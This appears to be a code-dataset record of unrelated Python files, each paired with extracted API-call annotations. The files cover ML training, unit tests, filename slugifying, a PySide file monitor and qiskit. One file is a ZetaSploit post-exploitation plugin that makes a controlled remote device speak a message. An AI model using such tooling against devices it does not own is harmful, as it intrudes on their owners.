bs_outputs_dict = self.model(bs_data, use_beam_search=False, output_sents=False)
bs_rewards = self.scorer(bs_outputs_dict)
self.model.train()
data[kfg.DECODE_BY_SAMPLE] = True
outputs_dict = self.model(data, use_beam_search=False, output_sents=False)
rewards = self.scorer(outputs_dict)
rewards = torch.from_numpy(rewards[kfg.REWARDS] - bs_rewards[kfg.REWARDS]).float().cuda()
outputs_dict.update({ kfg.REWARDS: rewards })
losses_dict = {}
for loss in self.losses:
loss_dict = loss(outputs_dict)
losses_dict.update(loss_dict)
losses = sum(losses_dict.values())
self.optimizer.zero_grad()
losses.backward()
bs_rewards.pop(kfg.REWARDS)
losses_dict.update(bs_rewards)
self._write_metrics(losses_dict, data_time)
self.optimizer.step()
|
[
"xmodaler.scorer.build_scorer",
"xmodaler.losses.build_rl_losses",
"copy.copy",
"time.perf_counter",
"xmodaler.utils.comm.unwrap_model",
"torch.no_grad",
"torch.from_numpy"
] |
[((590, 610), 'xmodaler.losses.build_rl_losses', 'build_rl_losses', (['cfg'], {}), '(cfg)\n', (605, 610), False, 'from xmodaler.losses import build_rl_losses\n'), ((680, 697), 'xmodaler.scorer.build_scorer', 'build_scorer', (['cfg'], {}), '(cfg)\n', (692, 697), False, 'from xmodaler.scorer import build_scorer\n'), ((742, 761), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (759, 761), False, 'import time\n'), ((1011, 1030), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (1028, 1030), False, 'import time\n'), ((1153, 1168), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1166, 1168), False, 'import torch\n'), ((1193, 1208), 'copy.copy', 'copy.copy', (['data'], {}), '(data)\n', (1202, 1208), False, 'import copy\n'), ((1057, 1086), 'xmodaler.utils.comm.unwrap_model', 'comm.unwrap_model', (['self.model'], {}), '(self.model)\n', (1074, 1086), True, 'import xmodaler.utils.comm as comm\n'), ((1575, 1639), 'torch.from_numpy', 'torch.from_numpy', (['(rewards[kfg.REWARDS] - bs_rewards[kfg.REWARDS])'], {}), '(rewards[kfg.REWARDS] - bs_rewards[kfg.REWARDS])\n', (1591, 1639), False, 'import torch\n')]
|
import unittest, random
from models.point import Point
from models.segment import Segment
import numpy as np
class TestSegmentMethods(unittest.TestCase):
def test_new(self):
with self.assertRaises(ValueError) as context:
Segment([])
def test_extremums(self):
a = Point(random.randint(0, 100), random.randint(0, 100))
b = Point(random.randint(0, 100), random.randint(0, 100))
c = Point(random.randint(0, 100), random.randint(0, 100))
segment = Segment([a, b, c])
self.assertEqual(segment.start, a)
self.assertEqual(segment.end, c)
def test_getitem(self):
a = Point(10, 20)
b = Point(20, 30)
c = Point(30, 40)
segment = Segment([a, b, c])
self.assertEqual(segment[Point(10, 20)], a) # Access by point
self.assertEqual(segment[20, 30], b) # Access by coordinates
self.assertEqual(segment[2], c) # Access by index
self.assertEqual(segment[100, 100], None) # Accessing a missing point
def test_append(self):
a = Point(10, 20)
b = Point(20, 30)
c = Point(30, 40)
segment = Segment([a, b, c])
segment.append(Point(31, 40))
# Working case
self.assertEqual(segment.end, Point(31, 40))
# Point is too far
with self.assertRaises(ValueError) as context:
segment.append(Point(100, 100))
# Point already exists
with self.assertRaises(ValueError) as context:
segment.append(Point(31, 40))
def test_angle(self):
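        # The assertions below imply that Segment.angle() is measured from the
        # vertical axis, i.e. angle = arctan(dx / dy).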
        angle_1 = Segment([Point(0, 0), Point(10, 10)]) # Angle is 45°
        angle_2 = Segment([Point(0, 0), Point(10, 20)]) # Angle is arctan(10/20)
        angle_half = Segment([Point(0, 0), Point(20, 10)]) # Angle is arctan(20/10)
        angle_vertical = Segment([Point(0, 0), Point(10, 0)]) # Angle is 90°
        angle_horizontal = Segment([Point(0, 0), Point(0, 10)]) # Angle is 0°
self.assertAlmostEqual(angle_1.angle(radians = True), np.pi / 4)
self.assertAlmostEqual(angle_half.angle(radians = True), np.arctan(2))
self.assertAlmostEqual(angle_horizontal.angle(radians = True), 0)
self.assertAlmostEqual(angle_vertical.angle(radians = True), np.pi / 2)
self.assertAlmostEqual(angle_1.angle(radians = False), 45)
self.assertAlmostEqual(angle_half.angle(radians = False), 63, places = 0)
self.assertAlmostEqual(angle_horizontal.angle(radians = False), 0)
self.assertAlmostEqual(angle_vertical.angle(radians = False), 90)
|
[
"numpy.arctan",
"random.randint",
"models.segment.Segment",
"models.point.Point"
] |
[((509, 527), 'models.segment.Segment', 'Segment', (['[a, b, c]'], {}), '([a, b, c])\n', (516, 527), False, 'from models.segment import Segment\n'), ((654, 667), 'models.point.Point', 'Point', (['(10)', '(20)'], {}), '(10, 20)\n', (659, 667), False, 'from models.point import Point\n'), ((680, 693), 'models.point.Point', 'Point', (['(20)', '(30)'], {}), '(20, 30)\n', (685, 693), False, 'from models.point import Point\n'), ((706, 719), 'models.point.Point', 'Point', (['(30)', '(40)'], {}), '(30, 40)\n', (711, 719), False, 'from models.point import Point\n'), ((739, 757), 'models.segment.Segment', 'Segment', (['[a, b, c]'], {}), '([a, b, c])\n', (746, 757), False, 'from models.segment import Segment\n'), ((1074, 1087), 'models.point.Point', 'Point', (['(10)', '(20)'], {}), '(10, 20)\n', (1079, 1087), False, 'from models.point import Point\n'), ((1100, 1113), 'models.point.Point', 'Point', (['(20)', '(30)'], {}), '(20, 30)\n', (1105, 1113), False, 'from models.point import Point\n'), ((1126, 1139), 'models.point.Point', 'Point', (['(30)', '(40)'], {}), '(30, 40)\n', (1131, 1139), False, 'from models.point import Point\n'), ((1159, 1177), 'models.segment.Segment', 'Segment', (['[a, b, c]'], {}), '([a, b, c])\n', (1166, 1177), False, 'from models.segment import Segment\n'), ((249, 260), 'models.segment.Segment', 'Segment', (['[]'], {}), '([])\n', (256, 260), False, 'from models.segment import Segment\n'), ((310, 332), 'random.randint', 'random.randint', (['(0)', '(100)'], {}), '(0, 100)\n', (324, 332), False, 'import unittest, random\n'), ((334, 356), 'random.randint', 'random.randint', (['(0)', '(100)'], {}), '(0, 100)\n', (348, 356), False, 'import unittest, random\n'), ((376, 398), 'random.randint', 'random.randint', (['(0)', '(100)'], {}), '(0, 100)\n', (390, 398), False, 'import unittest, random\n'), ((400, 422), 'random.randint', 'random.randint', (['(0)', '(100)'], {}), '(0, 100)\n', (414, 422), False, 'import unittest, random\n'), ((442, 464), 'random.randint', 'random.randint', (['(0)', '(100)'], {}), '(0, 100)\n', (456, 464), False, 'import unittest, random\n'), ((466, 488), 'random.randint', 'random.randint', (['(0)', '(100)'], {}), '(0, 100)\n', (480, 488), False, 'import unittest, random\n'), ((1202, 1215), 'models.point.Point', 'Point', (['(31)', '(40)'], {}), '(31, 40)\n', (1207, 1215), False, 'from models.point import Point\n'), ((1279, 1292), 'models.point.Point', 'Point', (['(31)', '(40)'], {}), '(31, 40)\n', (1284, 1292), False, 'from models.point import Point\n'), ((2123, 2135), 'numpy.arctan', 'np.arctan', (['(2)'], {}), '(2)\n', (2132, 2135), True, 'import numpy as np\n'), ((792, 805), 'models.point.Point', 'Point', (['(10)', '(20)'], {}), '(10, 20)\n', (797, 805), False, 'from models.point import Point\n'), ((1412, 1427), 'models.point.Point', 'Point', (['(100)', '(100)'], {}), '(100, 100)\n', (1417, 1427), False, 'from models.point import Point\n'), ((1551, 1564), 'models.point.Point', 'Point', (['(31)', '(40)'], {}), '(31, 40)\n', (1556, 1564), False, 'from models.point import Point\n'), ((1620, 1631), 'models.point.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (1625, 1631), False, 'from models.point import Point\n'), ((1633, 1646), 'models.point.Point', 'Point', (['(10)', '(10)'], {}), '(10, 10)\n', (1638, 1646), False, 'from models.point import Point\n'), ((1691, 1702), 'models.point.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (1696, 1702), False, 'from models.point import Point\n'), ((1704, 1717), 'models.point.Point', 'Point', (['(10)', '(20)'], {}), '(10, 20)\n', (1709, 1717), False, 'from models.point import Point\n'), ((1775, 1786), 'models.point.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (1780, 1786), False, 'from models.point import Point\n'), ((1788, 1801), 'models.point.Point', 'Point', (['(20)', '(10)'], {}), '(20, 10)\n', (1793, 1801), False, 'from models.point import Point\n'), ((1863, 1874), 'models.point.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (1868, 1874), False, 'from models.point import Point\n'), ((1876, 1888), 'models.point.Point', 'Point', (['(10)', '(0)'], {}), '(10, 0)\n', (1881, 1888), False, 'from models.point import Point\n'), ((1941, 1952), 'models.point.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (1946, 1952), False, 'from models.point import Point\n'), ((1954, 1966), 'models.point.Point', 'Point', (['(0)', '(10)'], {}), '(0, 10)\n', (1959, 1966), False, 'from models.point import Point\n')]
|
import efficientnet.keras as efn
import os
from keras.layers import *
from keras.models import Model
from keras.preprocessing.image import ImageDataGenerator
# load checkpoint
def get_efficientnet_check_point(argument):
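    # Note: this mapping eagerly instantiates all eight checkpoints (each
    # loading its ImageNet weights); only the requested one is returned.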
check_points = {
0: efn.EfficientNetB0(weights='imagenet'),
1: efn.EfficientNetB1(weights='imagenet'),
2: efn.EfficientNetB2(weights='imagenet'),
3: efn.EfficientNetB3(weights='imagenet'),
4: efn.EfficientNetB4(weights='imagenet'),
5: efn.EfficientNetB5(weights='imagenet'),
6: efn.EfficientNetB6(weights='imagenet'),
7: efn.EfficientNetB7(weights='imagenet')
}
    return check_points.get(argument, "Invalid checkpoint")
experiment_name = "test5_7"
data_dir = "test2"
working_dir = "/home/naor/projects/Image-Recognition"
model_name = f'{experiment_name}.h5'
train_data_input_folder = f'{working_dir}/{data_dir}/train/'
validation_data_input_folder = f'{working_dir}/test1/val/'
model_output_dir = f'{working_dir}/models'
model_output_path = f'{model_output_dir}/{model_name}'
if not os.path.exists(model_output_dir):
os.mkdir(model_output_dir)
# input dimension for current check point
input_dim = 600
model = efn.EfficientNetB7()
# remove last layer
model.layers.pop()
model.summary()
layer = Dense(5, activation='sigmoid', name='new_layer')(model.get_layer('avg_pool').output)
new_model = Model(model.input, layer)
# create new output layer
output_layer = Dense(5, activation='sigmoid', name='output')(new_model.get_layer('new_layer').output)
#
new_model = Model(model.input, output_layer)
# lock previous weights
for i, l in enumerate(new_model.layers):
if i < 228:
l.trainable = False
# new_model.compile(loss='sparse_categorical_crossentropy', optimizer='adam')
new_model.compile(loss='mean_squared_error', optimizer='adam')
# generate train data
train_datagen = ImageDataGenerator(
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
validation_split=0)
train_generator = train_datagen.flow_from_directory(
train_data_input_folder,
target_size=(input_dim, input_dim),
batch_size=8,
class_mode='categorical',
seed=2019,
subset='training')
validation_generator = train_datagen.flow_from_directory(
    validation_data_input_folder,
    target_size=(input_dim, input_dim),
    batch_size=4,
    class_mode='categorical',
    seed=2019)  # no subset: with validation_split=0 the 'validation' subset would be empty
new_model.fit_generator(
    train_generator,
    steps_per_epoch=2000 // 32,
    epochs=40,
    validation_steps=20,
    validation_data=validation_generator,
    workers=24)
new_model.save(model_output_path)
|
[
"keras.preprocessing.image.ImageDataGenerator",
"os.mkdir",
"efficientnet.keras.EfficientNetB1",
"efficientnet.keras.EfficientNetB5",
"efficientnet.keras.EfficientNetB0",
"efficientnet.keras.EfficientNetB3",
"os.path.exists",
"efficientnet.keras.EfficientNetB7",
"keras.models.Model",
"efficientnet.keras.EfficientNetB2",
"efficientnet.keras.EfficientNetB6",
"efficientnet.keras.EfficientNetB4"
] |
[((1209, 1229), 'efficientnet.keras.EfficientNetB7', 'efn.EfficientNetB7', ([], {}), '()\n', (1227, 1229), True, 'import efficientnet.keras as efn\n'), ((1391, 1416), 'keras.models.Model', 'Model', (['model.input', 'layer'], {}), '(model.input, layer)\n', (1396, 1416), False, 'from keras.models import Model\n'), ((1559, 1591), 'keras.models.Model', 'Model', (['model.input', 'output_layer'], {}), '(model.input, output_layer)\n', (1564, 1591), False, 'from keras.models import Model\n'), ((1883, 1980), 'keras.preprocessing.image.ImageDataGenerator', 'ImageDataGenerator', ([], {'shear_range': '(0.2)', 'zoom_range': '(0.2)', 'horizontal_flip': '(True)', 'validation_split': '(0)'}), '(shear_range=0.2, zoom_range=0.2, horizontal_flip=True,\n validation_split=0)\n', (1901, 1980), False, 'from keras.preprocessing.image import ImageDataGenerator\n'), ((1076, 1108), 'os.path.exists', 'os.path.exists', (['model_output_dir'], {}), '(model_output_dir)\n', (1090, 1108), False, 'import os\n'), ((1114, 1140), 'os.mkdir', 'os.mkdir', (['model_output_dir'], {}), '(model_output_dir)\n', (1122, 1140), False, 'import os\n'), ((253, 291), 'efficientnet.keras.EfficientNetB0', 'efn.EfficientNetB0', ([], {'weights': '"""imagenet"""'}), "(weights='imagenet')\n", (271, 291), True, 'import efficientnet.keras as efn\n'), ((304, 342), 'efficientnet.keras.EfficientNetB1', 'efn.EfficientNetB1', ([], {'weights': '"""imagenet"""'}), "(weights='imagenet')\n", (322, 342), True, 'import efficientnet.keras as efn\n'), ((355, 393), 'efficientnet.keras.EfficientNetB2', 'efn.EfficientNetB2', ([], {'weights': '"""imagenet"""'}), "(weights='imagenet')\n", (373, 393), True, 'import efficientnet.keras as efn\n'), ((406, 444), 'efficientnet.keras.EfficientNetB3', 'efn.EfficientNetB3', ([], {'weights': '"""imagenet"""'}), "(weights='imagenet')\n", (424, 444), True, 'import efficientnet.keras as efn\n'), ((457, 495), 'efficientnet.keras.EfficientNetB4', 'efn.EfficientNetB4', ([], {'weights': '"""imagenet"""'}), "(weights='imagenet')\n", (475, 495), True, 'import efficientnet.keras as efn\n'), ((508, 546), 'efficientnet.keras.EfficientNetB5', 'efn.EfficientNetB5', ([], {'weights': '"""imagenet"""'}), "(weights='imagenet')\n", (526, 546), True, 'import efficientnet.keras as efn\n'), ((559, 597), 'efficientnet.keras.EfficientNetB6', 'efn.EfficientNetB6', ([], {'weights': '"""imagenet"""'}), "(weights='imagenet')\n", (577, 597), True, 'import efficientnet.keras as efn\n'), ((610, 648), 'efficientnet.keras.EfficientNetB7', 'efn.EfficientNetB7', ([], {'weights': '"""imagenet"""'}), "(weights='imagenet')\n", (628, 648), True, 'import efficientnet.keras as efn\n')]
|
# -*- coding: utf-8 -*-
from slugify import slugify
import os
"""Main module."""
def ascii_safe_filename(filename: str) -> dict:
file = os.path.splitext(filename)
slug = slugify(file[0], separator="_")
ext = file[1]
return {"f_in": filename, "f_out": "{}{}".format(slug, ext)}
def slugifile_directory(path: str):
success = True
messages = []
if path is None:
success = False
messages.append("No path specified. Done.")
else:
path = path.rstrip("\\/")
if not os.path.isdir(path):
success = False
messages.append("Path specified is not a directory. Done.")
else:
filenames = os.listdir(path)
for filename in filenames:
result = ascii_safe_filename(filename)
f_in = result["f_in"]
f_out = result["f_out"]
if f_in == f_out:
messages.append("Skipping: {}".format(f_in))
continue
filename_in = "{}/{}".format(path, f_in)
filename_out = "{}/{}".format(path, f_out)
messages.append("Renaming: {} => {}".format(f_in, f_out))
os.rename(filename_in, filename_out)
return {"success": success, "messages": messages}
|
[
"slugify.slugify",
"os.path.isdir",
"os.rename",
"os.path.splitext",
"os.listdir"
] |
[((145, 171), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (161, 171), False, 'import os\n'), ((183, 214), 'slugify.slugify', 'slugify', (['file[0]'], {'separator': '"""_"""'}), "(file[0], separator='_')\n", (190, 214), False, 'from slugify import slugify\n'), ((531, 550), 'os.path.isdir', 'os.path.isdir', (['path'], {}), '(path)\n', (544, 550), False, 'import os\n'), ((690, 706), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (700, 706), False, 'import os\n'), ((1217, 1253), 'os.rename', 'os.rename', (['filename_in', 'filename_out'], {}), '(filename_in, filename_out)\n', (1226, 1253), False, 'import os\n')]
|
import os
import sys
import subprocess
from PySide import QtGui, QtCore
class FileSystemModel(QtGui.QFileSystemModel):
filter_reset = QtCore.Signal()
root_index_changed = QtCore.Signal(QtCore.QModelIndex)
status_changed = QtCore.Signal(int, int)
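    # Per-directory file that persists the set of already-processed entries.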
STORAGE_NAME = '.filemon.dat'
def __init__(self):
QtGui.QFileSystemModel.__init__(self)
self.setFilter(QtCore.QDir.AllDirs |
QtCore.QDir.NoDot |
QtCore.QDir.NoDotDot |
QtCore.QDir.AllEntries |
QtCore.QDir.DirsFirst |
QtCore.QDir.Name)
self._processed = set()
self._marked_count = 0
self._total_count = 0
self.setNameFilterDisables(False)
self.directoryLoaded.connect(self._update_stats)
def _update_stats(self):
files = self._files()
print(files, self._processed)
self._marked_count = sum(1 for f in files if f in self._processed)
self._total_count = len(files)
self.status_changed.emit(self._total_count, self._marked_count)
@QtCore.Slot(str)
def filter_changed(self, text):
print('filter changed', text)
text = text.strip()
if text:
self.setNameFilters(['*' + text + '*'])
else:
self.setNameFilters([])
self._update_stats()
def _files(self):
ret = []
idx = self.index(self.rootPath())
for i in range(0, self.rowCount(idx)):
child = idx.child(i, idx.column())
ret.append(self.fileName(child))
return ret
def set_path(self, path):
print(path)
path = os.path.abspath(path)
self.reset()
self.setRootPath(path)
self.filter_reset.emit()
self.root_index_changed.emit(self.index(path))
storage = os.path.join(path, self.STORAGE_NAME)
self._processed = set()
present = set(os.listdir(path))
if os.path.isfile(storage):
with open(storage) as f:
data = set(f.read().splitlines())
self._processed = data - present
if data != self._processed:
self._save()
self._update_stats()
@QtCore.Slot()
def go_parent(self):
path = self.rootPath()
self.set_path(path + '/..')
@QtCore.Slot()
def go_home(self):
path = os.path.expanduser('~')
self.set_path(path)
@QtCore.Slot()
def go_cwd(self):
self.set_path(os.getcwd())
def file_dragged(self, path):
print("Dragged", path)
self._processed.add(path)
self._save()
def _save(self):
self._update_stats()
storage = os.path.join(self.rootPath(), self.STORAGE_NAME)
with open(storage, 'w') as f:
f.write('\n'.join(sorted(self._processed)))
def data(self, index, role):
if index.isValid() and role == QtCore.Qt.ForegroundRole:
path = self.filePath(index)
if path in self._processed:
return QtGui.QBrush(QtGui.QColor(255, 0, 0))
return super().data(index, role)
@QtCore.Slot()
def reset_markers(self):
self._processed = set()
self._save()
self.set_path(self.rootPath())
def unmark(self, index):
if not index.isValid():
return
path = self.filePath(index)
self._processed.discard(path)
self._save()
self.set_path(self.rootPath())
def start_file(self, index):
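        # Open with the platform's default handler: os.startfile on Windows,
        # "open" on macOS, "xdg-open" on other Unixes.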
        filename = self.filePath(index)  # full path, so the handler works regardless of the current directory
if sys.platform == "win32":
os.startfile(filename)
else:
opener = "open" if sys.platform == "darwin" else "xdg-open"
subprocess.call([opener, filename])
class FileView(QtGui.QListView):
def __init__(self, parent):
QtGui.QListView.__init__(self, parent)
self.setDragEnabled(True)
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
self._drag_start_pos = event.pos()
return QtGui.QListView.mousePressEvent(self, event)
def mouseMoveEvent(self, event):
if not event.buttons() & QtCore.Qt.LeftButton:
return
if ((event.pos() - self._drag_start_pos).manhattanLength() <
QtGui.QApplication.startDragDistance()):
return
model = self.model()
drag = QtGui.QDrag(self)
index = self.indexAt(self._drag_start_pos)
if not index.isValid():
return
if model.isDir(index):
return
path = model.filePath(index)
mimedata = model.mimeData([index])
drag.setMimeData(mimedata)
drop_action = drag.exec_(QtCore.Qt.CopyAction)
if drop_action == QtCore.Qt.CopyAction:
model.file_dragged(path)
|
[
"os.path.expanduser",
"os.path.abspath",
"PySide.QtCore.Slot",
"os.getcwd",
"PySide.QtGui.QDrag",
"PySide.QtGui.QApplication.startDragDistance",
"PySide.QtGui.QColor",
"os.path.isfile",
"subprocess.call",
"PySide.QtGui.QFileSystemModel.__init__",
"PySide.QtCore.Signal",
"PySide.QtGui.QListView.mousePressEvent",
"PySide.QtGui.QListView.__init__",
"os.path.join",
"os.listdir",
"os.startfile"
] |
[((141, 156), 'PySide.QtCore.Signal', 'QtCore.Signal', ([], {}), '()\n', (154, 156), False, 'from PySide import QtGui, QtCore\n'), ((182, 215), 'PySide.QtCore.Signal', 'QtCore.Signal', (['QtCore.QModelIndex'], {}), '(QtCore.QModelIndex)\n', (195, 215), False, 'from PySide import QtGui, QtCore\n'), ((237, 260), 'PySide.QtCore.Signal', 'QtCore.Signal', (['int', 'int'], {}), '(int, int)\n', (250, 260), False, 'from PySide import QtGui, QtCore\n'), ((1120, 1136), 'PySide.QtCore.Slot', 'QtCore.Slot', (['str'], {}), '(str)\n', (1131, 1136), False, 'from PySide import QtGui, QtCore\n'), ((2255, 2268), 'PySide.QtCore.Slot', 'QtCore.Slot', ([], {}), '()\n', (2266, 2268), False, 'from PySide import QtGui, QtCore\n'), ((2367, 2380), 'PySide.QtCore.Slot', 'QtCore.Slot', ([], {}), '()\n', (2378, 2380), False, 'from PySide import QtGui, QtCore\n'), ((2477, 2490), 'PySide.QtCore.Slot', 'QtCore.Slot', ([], {}), '()\n', (2488, 2490), False, 'from PySide import QtGui, QtCore\n'), ((3168, 3181), 'PySide.QtCore.Slot', 'QtCore.Slot', ([], {}), '()\n', (3179, 3181), False, 'from PySide import QtGui, QtCore\n'), ((329, 366), 'PySide.QtGui.QFileSystemModel.__init__', 'QtGui.QFileSystemModel.__init__', (['self'], {}), '(self)\n', (360, 366), False, 'from PySide import QtGui, QtCore\n'), ((1693, 1714), 'os.path.abspath', 'os.path.abspath', (['path'], {}), '(path)\n', (1708, 1714), False, 'import os\n'), ((1873, 1910), 'os.path.join', 'os.path.join', (['path', 'self.STORAGE_NAME'], {}), '(path, self.STORAGE_NAME)\n', (1885, 1910), False, 'import os\n'), ((1994, 2017), 'os.path.isfile', 'os.path.isfile', (['storage'], {}), '(storage)\n', (2008, 2017), False, 'import os\n'), ((2419, 2442), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (2437, 2442), False, 'import os\n'), ((3873, 3911), 'PySide.QtGui.QListView.__init__', 'QtGui.QListView.__init__', (['self', 'parent'], {}), '(self, parent)\n', (3897, 3911), False, 'from PySide import QtGui, QtCore\n'), ((4098, 4142), 'PySide.QtGui.QListView.mousePressEvent', 'QtGui.QListView.mousePressEvent', (['self', 'event'], {}), '(self, event)\n', (4129, 4142), False, 'from PySide import QtGui, QtCore\n'), ((4445, 4462), 'PySide.QtGui.QDrag', 'QtGui.QDrag', (['self'], {}), '(self)\n', (4456, 4462), False, 'from PySide import QtGui, QtCore\n'), ((1965, 1981), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (1975, 1981), False, 'import os\n'), ((2535, 2546), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2544, 2546), False, 'import os\n'), ((3640, 3662), 'os.startfile', 'os.startfile', (['filename'], {}), '(filename)\n', (3652, 3662), False, 'import os\n'), ((3761, 3796), 'subprocess.call', 'subprocess.call', (['[opener, filename]'], {}), '([opener, filename])\n', (3776, 3796), False, 'import subprocess\n'), ((4340, 4378), 'PySide.QtGui.QApplication.startDragDistance', 'QtGui.QApplication.startDragDistance', ([], {}), '()\n', (4376, 4378), False, 'from PySide import QtGui, QtCore\n'), ((3096, 3119), 'PySide.QtGui.QColor', 'QtGui.QColor', (['(255)', '(0)', '(0)'], {}), '(255, 0, 0)\n', (3108, 3119), False, 'from PySide import QtGui, QtCore\n')]
|
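A minimal standalone sketch of the sidecar-file persistence scheme the model above uses (`.filemon.dat`, one entry per line); the helper names here are invented for illustration and are not part of the original file:

import os

STORAGE_NAME = '.filemon.dat'

def load_processed(directory):
    """Return the set of marked entries recorded for *directory*."""
    storage = os.path.join(directory, STORAGE_NAME)
    if not os.path.isfile(storage):
        return set()
    with open(storage) as f:
        return set(f.read().splitlines())

def save_processed(directory, processed):
    """Write the marker set back, sorted, one entry per line."""
    storage = os.path.join(directory, STORAGE_NAME)
    with open(storage, 'w') as f:
        f.write('\n'.join(sorted(processed)))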
#!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from core.badges import badges
class ZetaSploitPlugin:
def __init__(self, controller):
self.controller = controller
self.badges = badges()
self.details = {
'Name': "multi/trolling/say",
'Authors': ['enty8080'],
'Description': "Say text message on device.",
'Comment': "idk?"
}
self.options = {
'MESSAGE': {
'Description': "Message to say.",
'Value': "Hello, zeterpreter!",
'Required': True
}
}
def run(self):
status, output = self.controller.send_command("say", self.options['MESSAGE']['Value'])
if status == "error":
print(self.badges.E + "Failed to say message!")
|
[
"core.badges.badges"
] |
[((1282, 1290), 'core.badges.badges', 'badges', ([], {}), '()\n', (1288, 1290), False, 'from core.badges import badges\n')]
|
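The plugin above only requires a controller object with a send_command(command, args) method returning a (status, output) pair. A hypothetical harness (the stub controller is invented here, and running it assumes the module's core.badges dependency is importable):

class FakeController:
    """Stand-in for the zeterpreter controller interface used by run()."""
    def send_command(self, command, args):
        print('->', command, args)
        return 'success', ''

plugin = ZetaSploitPlugin(FakeController())
plugin.run()  # sends: say "Hello, zeterpreter!"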
# vim:fileencoding=UTF-8
#
# Copyright © 2016, 2019 <NAME>
#
# Licensed under the Apache License, Version 2.0 with modifications,
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://raw.githubusercontent.com/StanLivitski/EPyColl/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Helpers for obtaining information about callable
objects and have the same code run different types of callables.
Key elements
------------
prepare_call : A function that unwraps a callable, if necessary,
and tells whether the resulting object requires the ``self``
argument to be called.
call : Calls the target object, prepending ``self``
argument if necessary.
"""
import version
version.requirePythonVersion(3, 3)
def call(callable_, globals_, self, *args, **kwargs):
"""
Calls the target object, prepending ``self`` argument to
the argument list if necessary.
Parameters
----------
callable_ : callable
Reference to a function or method object or wrapper.
globals_ : dict
The dictionary of the module defining the target callable,
or the local dictionary for the scope in which the target callable's
container is defined.
self : object | None
The value to be passed as ``self`` argument, if
required by the target.
args : collections.Iterable
Any positional arguments, excluding ``self``.
kwargs : collections.Mapping
Any keyword arguments, excluding ``self``.
Returns
-------
object | None
Any value returned by the call.
Raises
------
TypeError
If the argument is not callable or has unknown type.
BaseException
Any exception thrown by the call.
See Also
--------
prepare_call : processes the callable before making the call
"""
target, selfNeeded = prepare_call(callable_, globals_)
_args = [ self ] if selfNeeded else []
_args.extend(args)
return target(*_args, **kwargs)
def prepare_call(callable_, globals_):
"""
Unwrap method decorators applied to ``callable_`` and
tell whether the resulting object requires the ``self``
argument to be called.
Dereferences ``@staticmethod`` and ``@classmethod`` decorators
and returns a flag telling whether explicit ``self`` argument
is required. This method may be used when preparing class
definitions (e.g. decorating methods) as well as at runtime.
Parameters
----------
callable_ : callable
Reference to a function or method object or wrapper.
globals_ : dict
The dictionary of the module defining the target callable,
or the local dictionary for the scope in which the target callable's
container is defined. If the container has not yet been defined
(e.g. when processing a decorator) this mapping should also contain
its future qualified name mapped to the ``object`` type value.
Returns
-------
callable
Dereferenced callable object.
boolean
A flag telling whether explicit ``self`` argument must
be on the argument list.
Raises
------
TypeError
If the argument is not callable or has unknown type.
"""
bindable = None
if not callable(callable_) and hasattr(callable_, '__func__'):
if isinstance(callable_, staticmethod):
bindable = False
callable_ = callable_.__func__
if not callable(callable_):
raise TypeError('Argument of type %s is not callable' % type(callable_).__name__)
if hasattr(callable_, '__self__'):
bindable = False
if bindable is None:
prefix = callable_.__qualname__[:-len(callable_.__name__)]
if prefix:
assert '.' == prefix[-1]
prefix = prefix[:-1]
try:
bindable = isinstance(eval(prefix, globals_), type)
except:
bindable = False
else:
bindable = False
return callable_, bindable
|
[
"version.requirePythonVersion"
] |
[((1111, 1145), 'version.requirePythonVersion', 'version.requirePythonVersion', (['(3)', '(3)'], {}), '(3, 3)\n', (1139, 1145), False, 'import version\n')]
|
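A quick illustration of prepare_call/call from the module above; the function and class below are made up for the demo:

def shout(text):
    return text.upper()

class Greeter:
    def hello(self, name):
        return 'hello ' + name

# A module-level function has an empty qualname prefix, so no self is needed:
_, needs_self = prepare_call(shout, globals())
assert needs_self is False
assert call(shout, globals(), None, 'hi') == 'HI'

# A method's qualname prefix ("Greeter") evaluates to a class, so
# prepare_call reports that an explicit self must be prepended:
_, needs_self = prepare_call(Greeter.hello, globals())
assert needs_self is True
assert call(Greeter.hello, globals(), Greeter(), 'world') == 'hello world'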
print('\nDevice Monitor')
print('----------------')
from qiskit import IBMQ
from qiskit.tools.monitor import backend_overview
IBMQ.enable_account('Insert API token here') # Insert your API token here
provider = IBMQ.get_provider(hub='ibm-q')
backend_overview() # Function to get all information back about each quantum device
print('\nPress any key to close')
input()
|
[
"qiskit.IBMQ.enable_account",
